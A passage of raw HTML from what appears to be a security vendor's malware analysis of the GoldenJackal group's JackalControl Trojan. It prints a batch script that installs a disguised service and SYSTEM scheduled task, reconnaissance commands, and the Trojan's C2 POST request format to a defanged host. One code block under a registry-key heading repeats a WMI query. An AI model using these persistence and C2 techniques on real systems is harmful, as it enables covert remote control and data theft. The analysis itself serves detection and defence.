class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467989845621930-16">16</div><div class="crayon-num" data-line="crayon-67b40d9467989845621930-17">17</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467989845621930-18">18</div><div class="crayon-num" data-line="crayon-67b40d9467989845621930-19">19</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467989845621930-20">20</div><div class="crayon-num" data-line="crayon-67b40d9467989845621930-21">21</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d9467989845621930-1"><span class="crayon-sy">$</span><span class="crayon-i">temp</span><span class="crayon-sy">\</span><span class="crayon-sy">\</span><span class="crayon-i">dnf4</span><span class="crayon-sy">.</span><span class="crayon-i">exe</span><span class="crayon-h"> </span>/<span class="crayon-i">q</span><span class="crayon-h"> </span>/<span class="crayon-e">norestart</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467989845621930-2"><span class="crayon-e">tasklist</span></div><div class="crayon-line" id="crayon-67b40d9467989845621930-3"><span class="crayon-e">sc </span><span class="crayon-i">qc</span><span class="crayon-h"> </span><span class="crayon-s">"WEvMngS"</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467989845621930-4"><span class="crayon-e">sc </span><span class="crayon-i">stop</span><span class="crayon-h"> </span><span class="crayon-s">"WEvMngS"</span></div><div class="crayon-line" id="crayon-67b40d9467989845621930-5"><span class="crayon-e">sc </span><span class="crayon-i">delete</span><span class="crayon-h"> </span><span class="crayon-s">"WEvMngS"</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467989845621930-6"><span 
class="crayon-e">sc </span><span class="crayon-i">create</span><span class="crayon-h"> </span><span class="crayon-s">"WEvMngS"</span><span class="crayon-h"> </span><span class="crayon-i">binpath</span>=<span class="crayon-h"> </span><span class="crayon-s">"\"$windir\WEvMngS.exe\" /1"</span><span class="crayon-h"> </span><span class="crayon-i">displayname</span>=<span class="crayon-h"> </span><span class="crayon-s">"Windows</span></div><div class="crayon-line" id="crayon-67b40d9467989845621930-7"><span class="crayon-s">Event Manager"</span><span class="crayon-h"> </span><span class="crayon-i">type</span>=<span class="crayon-h"> </span><span class="crayon-e">own </span><span class="crayon-i">start</span>=<span class="crayon-h"> </span><span class="crayon-i">auto</span><span class="crayon-s">"</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467989845621930-8"><span class="crayon-s">sc description "</span><span class="crayon-i">WEvMngS</span><span class="crayon-s">" "</span><span class="crayon-e">Provides </span><span class="crayon-i">event</span>-<span class="crayon-e">related </span><span class="crayon-e">methods </span><span class="crayon-e">that </span><span class="crayon-e">register </span><span class="crayon-e">routed</span></div><div class="crayon-line" id="crayon-67b40d9467989845621930-9"><span class="crayon-i">events</span><span class="crayon-sy">.</span><span class="crayon-s">"</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467989845621930-10"><span class="crayon-s">sc start "</span><span class="crayon-i">WEvMngS</span><span class="crayon-s">"</span></div><div class="crayon-line" id="crayon-67b40d9467989845621930-11"><span class="crayon-s">schtasks /delete /f /tn "</span><span class="crayon-sy">\</span><span class="crayon-i">Microsoft</span><span class="crayon-sy">\</span><span class="crayon-i">Windows</span><span class="crayon-sy">\</span><span class="crayon-i">Diagnosis</span><span 
class="crayon-sy">\</span><span class="crayon-e">Event </span><span class="crayon-i">Manager</span><span class="crayon-s">"</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467989845621930-12"><span class="crayon-s">schtasks /create /f /tn "</span><span class="crayon-sy">\</span><span class="crayon-i">Microsoft</span><span class="crayon-sy">\</span><span class="crayon-i">Windows</span><span class="crayon-sy">\</span><span class="crayon-i">Diagnosis</span><span class="crayon-sy">\</span><span class="crayon-e">Event </span><span class="crayon-i">Manager</span><span class="crayon-s">" /xml</span></div><div class="crayon-line" id="crayon-67b40d9467989845621930-13"><span class="crayon-s">"</span><span class="crayon-sy">$</span><span class="crayon-i">temp</span><span class="crayon-sy">\</span><span class="crayon-sy">\</span><span class="crayon-i">sch</span><span class="crayon-sy">.</span><span class="crayon-i">xml</span><span class="crayon-s">" /ru "</span><span class="crayon-e">NT </span><span class="crayon-i">AUTHORITY</span><span class="crayon-sy">\</span><span class="crayon-i">SYSTEM</span><span class="crayon-s">"</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467989845621930-14"><span class="crayon-s">sc qc "</span><span class="crayon-i">WEvMngS</span><span class="crayon-s">"</span></div><div class="crayon-line" id="crayon-67b40d9467989845621930-15"><span class="crayon-s">schtasks /query /v /fo list /tn "</span><span class="crayon-sy">\</span><span class="crayon-i">Microsoft</span><span class="crayon-sy">\</span><span class="crayon-i">Windows</span><span class="crayon-sy">\</span><span class="crayon-i">Diagnosis</span><span class="crayon-sy">\</span><span class="crayon-e">Event </span><span class="crayon-i">Manager</span><span class="crayon-s">"</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467989845621930-16"><span class="crayon-s">tasklist</span></div><div class="crayon-line" 
id="crayon-67b40d9467989845621930-17"><span class="crayon-s">netstat -aon</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467989845621930-18"><span class="crayon-s">ping -n 1 google.com</span></div><div class="crayon-line" id="crayon-67b40d9467989845621930-19"><span class="crayon-s">ipconfig /displaydns</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467989845621930-20"><span class="crayon-s">netsh winhttp show proxy</span></div><div class="crayon-line" id="crayon-67b40d9467989845621930-21"><span class="crayon-s">reg query "</span><span class="crayon-i">HKCU</span><span class="crayon-sy">\</span><span class="crayon-i">Software</span><span class="crayon-sy">\</span><span class="crayon-i">Microsoft</span><span class="crayon-sy">\</span><span class="crayon-i">Windows</span><span class="crayon-sy">\</span><span class="crayon-i">CurrentVersion</span><span class="crayon-sy">\</span><span class="crayon-e">Internet </span><span class="crayon-i">Settings</span>"<span class="crayon-h"> </span>/<span class="crayon-i">v</span></div></div></td> </tr> </table> </div> </div> <h2 id="jackalcontrol">JackalControl</h2> <p>This is a Trojan that allows the attackers to remotely control the target machine through a set of predefined and supported commands. These are received via an HTTPS communication channel established between the malware and the C2 servers, and can instruct the implant to perform any of the following operations:</p> <ul> <li>Execute an arbitrary program with provided arguments</li> <li>Download arbitrary files to the local file system</li> <li>Upload arbitrary files from the local file system</li> </ul> <p>Over the last few years, the attackers have updated this tool multiple times, and we have observed multiple variants. 
We describe the latest version here, which was observed in January 2023 (8C1070F188AE87FBA1148A3D791F2523).</p> <p>The Trojan is an executable file that can be started either as a standard program or as a Windows service.</p> <p>It expects an argument, which must be one of the following values:</p> <ul> <li>/0: runs as a standard program and contacts the C2 servers only once</li> <li>/1: runs as a standard program and contacts the C2 servers periodically</li> <li>/2: runs as a Windows service</li> </ul> <p>The accepted arguments and the corresponding behavior vary between variants. Some variants offer only two arguments:</p> <ul> <li>/0: runs as a standard program</li> <li>/1: runs as a Windows service</li> </ul> <p>Other variants can install themselves using different persistence mechanisms. The malware’s execution flow is determined by the command-line arguments with which it is run.</p> <ul> <li>/h0: causes the malware to gain persistence by creating a Windows scheduled task.</li> <li>/h1: causes the malware to gain persistence by creating a corresponding registry run key.</li> <li>/h2: causes the malware to gain persistence by creating a Windows service.</li> <li>/r0: runs as a standard process (this argument is specified by the Windows scheduled task).</li> <li>/r1: runs as a standard process (this argument is specified by the generated registry run key value).</li> <li>/r2: runs as a service (this argument is specified by the created Windows service).</li> </ul> <p>Over the years, the attackers have distributed different variants: some include code to maintain persistence, while others were configured to run without infecting the system, in which case the infection procedure is usually performed by other components, such as the batch script mentioned above.</p> <p>The malware starts its activities by generating a BOT_ID, a unique value used to identify the compromised system. 
This value is derived from several other host-based values:</p> <p>The UUID value obtained from the following WMI query:</p> <div id="crayon-67b40d946798b001596442" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> select * from win32_computersystemproduct</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d946798b001596442-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px 
!important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d946798b001596442-1"><span class="crayon-e ">select *</span><span class="crayon-h"> </span><span class="crayon-e">from </span><span class="crayon-i">win32_computersystemproduct</span></div></div></td> </tr> </table> </div> </div><p> The machine GUID obtained from the following registry key:</p> <div id="crayon-67b40d946798d886101863" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> select * from win32_computersystemproduct</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr 
class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d946798d886101863-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d946798d886101863-1"><span class="crayon-e ">select *</span><span class="crayon-h"> </span><span class="crayon-e">from </span><span class="crayon-i">win32_computersystemproduct</span></div></div></td> </tr> </table> </div> </div><p> The list of attached drives, obtained from another WMI query, which in turn allows them to determine the ‘SerialNumber’ of ‘PHYSICALDRIVE0’:</p> <div id="crayon-67b40d946798e958403240" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 
16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> select * from win32_diskdrive</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d946798e958403240-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d946798e958403240-1"><span class="crayon-e ">select *</span><span class="crayon-h"> </span><span class="crayon-e">from </span><span class="crayon-i">win32_diskdrive</span></div></div></td> </tr> </table> </div> </div><p> The collected information is concatenated into a byte array and hashed with MD5; the resulting hash is used as the seed for the BOT_ID. The generation algorithm simply sums every two consecutive bytes of the MD5 hash and stores the result (modulo 256) as a single byte of the final BOT_ID. 
This logic is shown in the code snippet below, taken from the malware.</p> <p style="text-align: center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16215704/GoldenJackal_APT_05.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-109712" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16215704/GoldenJackal_APT_05.png" alt="Code snippet used to generate the BOT_ID" width="591" height="127" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16215704/GoldenJackal_APT_05.png 591w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16215704/GoldenJackal_APT_05-300x64.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16215704/GoldenJackal_APT_05-370x80.png 370w" sizes="auto, (max-width: 591px) 100vw, 591px" /></a></p> <p style="text-align: center"><strong><em>Code snippet used to generate the BOT_ID</em></strong></p> <p>The resulting BOT_ID is also used to initialize the DES key and IV, which are then used to encrypt communication with the C2.</p> <p>The malware communicates using HTTP POST requests in which the data arguments are carried, in encoded form, in the request body. 
The overall request structure will then appear as follows:</p> <div id="crayon-67b40d946798f045958837" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-mixed-highlight" title="Contains Mixed Languages"></span><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> POST /wp-includes/class-wp-network-statistics.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: multipart/form-data; boundary=----2c0272b325864985abf2677460a9b07a Accept-Language: en-GB,en;q=0.5 Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0, no-cache Pragma: no-cache Host: 
finasteridehair[.]com Content-Length: 154 Expect: 100-continue ------2c0272b325864985abf2677460a9b07a Content-Disposition: form-data; name="adv" %ENCODED_DATA% ------2c0272b325864985abf2677460a9b07a</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d946798f045958837-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d946798f045958837-2">2</div><div class="crayon-num" data-line="crayon-67b40d946798f045958837-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d946798f045958837-4">4</div><div class="crayon-num" data-line="crayon-67b40d946798f045958837-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d946798f045958837-6">6</div><div class="crayon-num" data-line="crayon-67b40d946798f045958837-7">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d946798f045958837-8">8</div><div class="crayon-num" data-line="crayon-67b40d946798f045958837-9">9</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d946798f045958837-10">10</div><div class="crayon-num" data-line="crayon-67b40d946798f045958837-11">11</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d946798f045958837-12">12</div><div class="crayon-num" data-line="crayon-67b40d946798f045958837-13">13</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d946798f045958837-14">14</div><div class="crayon-num" data-line="crayon-67b40d946798f045958837-15">15</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d946798f045958837-16">16</div><div class="crayon-num" data-line="crayon-67b40d946798f045958837-17">17</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d946798f045958837-18">18</div></div> 
</td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d946798f045958837-1"><span class="crayon-i">POST</span><span class="crayon-h"> </span>/<span class="crayon-i">wp</span>-<span class="crayon-i">includes</span>/<span class="crayon-t">class</span>-<span class="crayon-i">wp</span>-<span class="crayon-i">network</span>-<span class="crayon-i">statistics</span><span class="crayon-sy">.</span><span class="crayon-e">php </span><span class="crayon-i">HTTP</span>/<span class="crayon-cn">1.1</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d946798f045958837-2"><span class="crayon-i">User</span>-<span class="crayon-i">Agent</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">Mozilla</span>/<span class="crayon-cn">5.0</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-e">Windows </span><span class="crayon-i">NT</span><span class="crayon-h"> </span><span class="crayon-cn">6.1</span><span class="crayon-sy">;</span><span class="crayon-h"> </span><span class="crayon-i">Win64</span><span class="crayon-sy">;</span><span class="crayon-h"> </span><span class="crayon-i">x64</span><span class="crayon-sy">;</span><span class="crayon-h"> </span><span class="crayon-i">rv</span><span class="crayon-sy">:</span><span class="crayon-cn">68.0</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-i">Gecko</span>/<span class="crayon-cn">20100101</span></div><div class="crayon-line" id="crayon-67b40d946798f045958837-3"><span class="crayon-i">Firefox</span>/<span class="crayon-cn">68.0</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d946798f045958837-4"><span class="crayon-i">Accept</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span 
class="crayon-i">text</span>/<span class="crayon-i">html</span><span class="crayon-sy">,</span><span class="crayon-i">application</span>/<span class="crayon-i">xhtml</span>+<span class="crayon-i">xml</span><span class="crayon-sy">,</span><span class="crayon-i">application</span>/<span class="crayon-i">xml</span><span class="crayon-sy">;</span><span class="crayon-i">q</span>=<span class="crayon-cn">0.9</span><span class="crayon-sy">,</span>*/*<span class="crayon-sy">;</span><span class="crayon-i">q</span>=<span class="crayon-cn">0.8</span></div><div class="crayon-line" id="crayon-67b40d946798f045958837-5"><span class="crayon-i">Content</span>-<span class="crayon-i">Type</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">multipart</span>/<span class="crayon-i">form</span>-<span class="crayon-i">data</span><span class="crayon-sy">;</span><span class="crayon-h"> </span><span class="crayon-i">boundary</span>=----<span class="crayon-cn">2c0272b325864985abf2677460a9b07a</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d946798f045958837-6"><span class="crayon-i">Accept</span>-<span class="crayon-i">Language</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">en</span>-<span class="crayon-i">GB</span><span class="crayon-sy">,</span><span class="crayon-i">en</span><span class="crayon-sy">;</span><span class="crayon-i">q</span>=<span class="crayon-cn">0.5</span></div><div class="crayon-line" id="crayon-67b40d946798f045958837-7"><span class="crayon-i">Upgrade</span>-<span class="crayon-i">Insecure</span>-<span class="crayon-i">Requests</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-cn">1</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d946798f045958837-8"><span class="crayon-i">Cache</span>-<span class="crayon-i">Control</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span 
class="crayon-i">max</span>-<span class="crayon-i">age</span>=<span class="crayon-cn">0</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-i">no</span>-<span class="crayon-e">cache</span></div><div class="crayon-line" id="crayon-67b40d946798f045958837-9"><span class="crayon-i">Pragma</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">no</span>-<span class="crayon-e">cache</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d946798f045958837-10"><span class="crayon-i">Host</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">finasteridehair</span><span class="crayon-sy">[</span><span class="crayon-sy">.</span><span class="crayon-sy">]</span><span class="crayon-e">com</span></div><div class="crayon-line" id="crayon-67b40d946798f045958837-11"><span class="crayon-i">Content</span>-<span class="crayon-i">Length</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-cn">154</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d946798f045958837-12"><span class="crayon-i">Expect</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-cn">100</span>-<span class="crayon-st">continue</span></div><div class="crayon-line" id="crayon-67b40d946798f045958837-13"> </div><div class="crayon-line crayon-striped-line" id="crayon-67b40d946798f045958837-14">------<span class="crayon-cn">2c0272b325864985abf2677460a9b07a</span></div><div class="crayon-line" id="crayon-67b40d946798f045958837-15"><span class="crayon-i">Content</span>-<span class="crayon-i">Disposition</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">form</span>-<span class="crayon-i">data</span><span class="crayon-sy">;</span><span class="crayon-h"> </span><span class="crayon-i">name</span>=<span class="crayon-s">"adv"</span></div><div class="crayon-line 
crayon-striped-line" id="crayon-67b40d946798f045958837-16"><span class="crayon-ta">%</span><span class="crayon-i">ENCODED_DATA</span><span class="crayon-sy">%</span></div><div class="crayon-line" id="crayon-67b40d946798f045958837-17"> </div><div class="crayon-line crayon-striped-line" id="crayon-67b40d946798f045958837-18">------<span class="crayon-cn">2c0272b325864985abf2677460a9b07a</span></div></div></td> </tr> </table> </div> </div><p> A valid response should in turn be formed in the following way:</p> <div id="crayon-67b40d9467991903875404" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; margin-left: auto; margin-right: auto; clear: none; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> 
<!-- DEBUGDATA::%ENCODED_DATA% --></textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d9467991903875404-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d9467991903875404-1"><span class="crayon-h"><</span><span class="crayon-sy">!</span>--<span class="crayon-h"> </span><span class="crayon-i">DEBUGDATA</span><span class="crayon-sy">:</span><span class="crayon-sy">:</span><span class="crayon-sy">%</span><span class="crayon-i">ENCODED_DATA</span><span class="crayon-sy">%</span><span class="crayon-h"> </span>--<span class="crayon-h">></span></div></div></td> </tr> </table> </div> </div><p> The response is decoded with base64: the resulting payload is an array of strings, where the used delimiter is the standard Windows new line sequence – “\r\n”. 
Each line is decoded again with base64, decrypted with DES, and decompressed with the GZIP algorithm.</p> <p>Each command has the following structure:</p> <p style="text-align: center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16220013/GoldenJackal_APT_06.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-109713" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16220013/GoldenJackal_APT_06.png" alt="Command structure" width="799" height="63" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16220013/GoldenJackal_APT_06.png 799w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16220013/GoldenJackal_APT_06-300x24.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16220013/GoldenJackal_APT_06-768x61.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16220013/GoldenJackal_APT_06-370x29.png 370w" sizes="auto, (max-width: 799px) 100vw, 799px" /></a></p> <p style="text-align: center"><strong><em>Command structure</em></strong></p> <p>The command type must be equal to one of the following codes:</p> <table width="100%"> <tbody> <tr> <td style="background-color: #d9d9d9;text-align: center" width="25%"><strong>Command</strong></td> <td style="background-color: #d9d9d9;text-align: center" width="75%"><strong>Description</strong></td> </tr> <tr> <td style="padding-left: 10px">00</td> <td>Execute – Execute an arbitrary program with the specified arguments. 
If the attacker sets the NoWait flag to False, the malware redirects the process output, reads the data and forwards it to the C2.</td> </tr> <tr> <td style="padding-left: 10px">01</td> <td>Download – Read a file from the local system and upload it to the server (the command names are chosen from the C2 server’s point of view).</td> </tr> <tr> <td style="padding-left: 10px">02</td> <td>Upload – Save received data to the local system using the filepath specified by the attacker.</td> </tr> </tbody> </table> <p>The Command Data field carries the command arguments and has a different structure for each action type, as specified below:</p> <ul> <li><strong>Execute</strong><br /> <a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16220318/GoldenJackal_APT_07.png" class="magnificImage"><img decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16220318/GoldenJackal_APT_07.png" alt="Command Data layout for the Execute command" width="100%" /></a></li> <li><strong>Download</strong><br /> <a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16220338/GoldenJackal_APT_08.png" class="magnificImage"><img decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16220338/GoldenJackal_APT_08.png" alt="Command Data layout for the Download command" width="100%" /></a></li> <li><strong>Upload</strong><br /> <a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16220355/GoldenJackal_APT_09.png" class="magnificImage"><img decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16220355/GoldenJackal_APT_09.png" alt="Command Data layout for the Upload command" width="100%" /></a></li> </ul> <p>The command results are usually composed into a message that also includes the values of the underlying command type and command ID, which uniquely identifies an instance of a command issued to the malware. 
